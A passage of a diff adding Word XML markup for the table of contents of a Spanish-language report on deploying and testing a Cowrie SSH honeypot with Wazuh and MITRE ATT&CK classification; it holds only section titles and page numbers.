+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Hetzner Cloud</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">	27</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:before="0" w:line="276"/>
+        <w:ind w:left="425"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Python 3</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">	28</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:before="0" w:line="276"/>
+        <w:ind w:left="425"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Wazuh 4.9.2</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">	29</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:before="0" w:line="276"/>
+        <w:ind w:left="425"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">MITRE ATT&amp;CK</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">	29</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:before="0" w:line="276"/>
+        <w:ind w:left="425"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Herramientas de Red y Seguridad</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">	29</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:before="0" w:line="276"/>
+        <w:ind w:left="425"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Herramientas de Desarrollo y Documentación</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">	30</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:before="120" w:line="276"/>
+        <w:ind w:left="0"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Metodología</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">	32</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:before="0" w:line="276"/>
+        <w:ind w:left="425"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Metodología Utilizada</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">	32</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:before="0" w:line="276"/>
+        <w:ind w:left="425"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Planificación Temporal</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">	32</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:before="0" w:line="276"/>
+        <w:ind w:left="425"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Presupuesto</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">	33</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:before="0" w:line="276"/>
+        <w:ind w:left="425"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">README y Git</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">	34</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:before="0" w:line="276"/>
+        <w:ind w:left="425"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Catálogo de Técnicas MITRE ATT&amp;CK</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">	34</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:before="120" w:line="276"/>
+        <w:ind w:left="0"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Implementación</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">	37</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:before="0" w:line="276"/>
+        <w:ind w:left="425"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Estrategia de Despliegue</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">	37</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:before="0" w:line="276"/>
+        <w:ind w:left="425"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Bastionado del Servidor</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">	38</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:before="0" w:line="276"/>
+        <w:ind w:left="425"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Instalación y Configuración de Cowrie</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">	39</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:before="0" w:line="276"/>
+        <w:ind w:left="425"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Exposición del Honeypot</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">	41</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:before="0" w:line="276"/>
+        <w:ind w:left="425"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Script de Análisis</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">	42</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:before="0" w:line="276"/>
+        <w:ind w:left="425"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Clasificación Automática en MITRE ATT&amp;CK</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">	43</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:before="0" w:line="276"/>
+        <w:ind w:left="425"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Herramienta de Aprovisionamiento en OCI</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">	44</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:before="0" w:line="276"/>
+        <w:ind w:left="425"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Normalización de Saltos de Línea</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">	44</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:before="120" w:line="276"/>
+        <w:ind w:left="0"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Pruebas</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">	46</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:before="0" w:line="276"/>
+        <w:ind w:left="425"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Entorno de Pruebas Local</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">	46</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:before="0" w:line="276"/>
+        <w:ind w:left="425"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Prueba de Arranque</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">	46</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:before="0" w:line="276"/>
+        <w:ind w:left="425"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Incidencia: Rechazo Silencioso de Todos los Logins</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">	46</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:before="0" w:line="276"/>
+        <w:ind w:left="425"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Ataque Simulado</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">	47</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:before="0" w:line="276"/>
+        <w:ind w:left="425"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Validación del Analizador con Datos Reales</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">	48</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:before="0" w:line="276"/>
+        <w:ind w:left="425"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Prueba del Clasificador MITRE ATT&amp;CK</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">	48</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:before="0" w:line="276"/>
+        <w:ind w:left="425"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Prueba de la Herramienta de Aprovisionamiento</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">	50</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:before="0" w:line="276"/>
+        <w:ind w:left="425"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Prueba de la Reserva de Memoria</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">	51</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:before="0" w:line="276"/>
+        <w:ind w:left="425"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Despliegue en Hetzner Cloud</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
